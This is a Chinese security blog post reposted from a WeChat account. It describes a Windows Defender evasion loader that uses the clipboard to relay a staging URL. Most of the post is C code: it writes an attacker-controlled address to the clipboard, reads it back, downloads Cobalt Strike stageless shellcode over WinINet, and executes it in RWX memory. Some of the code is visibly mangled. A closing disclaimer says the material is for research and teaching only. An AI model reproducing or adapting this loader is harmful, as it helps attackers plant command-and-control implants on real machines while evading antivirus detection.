【免杀思路】不一样的分离bypassDefender

admin 2025年4月6日23:33:33评论0 views字数 1355阅读4分31秒阅读模式
0x01 前言
在日常学习中,无意中看到利用剪切板做免杀的操作,但是多数都是使用有阶段的shellcode做的。在真实环境下,要使用无阶段的上线载荷,避免有阶段相关特征查杀,所以说无阶段shellcode免杀就来了

0x02 剪切板分分离
【免杀思路】不一样的分离bypassDefender
简单说我们可以把剪切板当成一块内存看就可以了

相关API:

BOOL OpenClipboard(  [in, optional] HWND hWndNewOwner  //打开剪贴板以供检查,并阻止其他应用程序修改剪贴板内容。);
HANDLE GetClipboardData(  [in] UINT uFormat  //从剪贴板中检索指定格式的数据。 剪贴板之前必须已打开。);
LPVOID GlobalLock(  [in] HGLOBAL hMem  //锁定全局内存对象并返回指向对象内存块的第一个字节的指针。);
为什么说分分离呢?因为剪切板是我们的中转,需要它获取我们的shellcdoe完成上线操作

0x03 免杀代码实现

在cmd命令行下通过clip命令可以操作剪切板,可以使用echo将中转地址写入剪切板

system("echo http://192.168.183.137:81/1.txt | clip");
获取中转地址

    BOOL Cb = OpenClipboard(NULL);    HANDLE hMem = GetClipboardData(CF_TEXT);    char* url = (char*)GlobalLock(hMem);
获取CS无阶段shellcode地址

【免杀思路】不一样的分离bypassDefender
    hInternet = InternetOpenA("Mozilla/5.0 (Macintosh; Intel Mac OS X 12.1; rv:91.0) Gecko/20100101 Firefox/91.0", INTERNET_OPEN_TYPE_DIRECT, NULLNULL0);    hConnect = InternetOpenUrlA(hInternet, url, NULL0, INTERNET_FLAG_NO_CACHE_WRITE, 0);    pBuf = (char*)malloc(dwBufferSize);    memset(pBuf, 0, dwBufferSize);    InternetReadFile(hConnect, pBuf, dwBufferSize, &dwRet);    InternetCloseHandle(hInternet);    InternetCloseHandle(hConnect);
再次远程下载内存执行上线

    char* scd = GetUrlPage(pBuf);    int shellcode_length = ; //shellcode大小    void* exec = VirtualAlloc(0, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);    memcpy(exec, scd, shellcode_length);    GlobalUnlock(hMem);    CloseClipboard();    ((void(*)())exec)();

原文始发于微信公众号(安全天书):【免杀思路】不一样的分离bypassDefender

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月6日23:33:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀思路】不一样的分离bypassDefenderhttps://cn-sec.com/archives/3916705.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息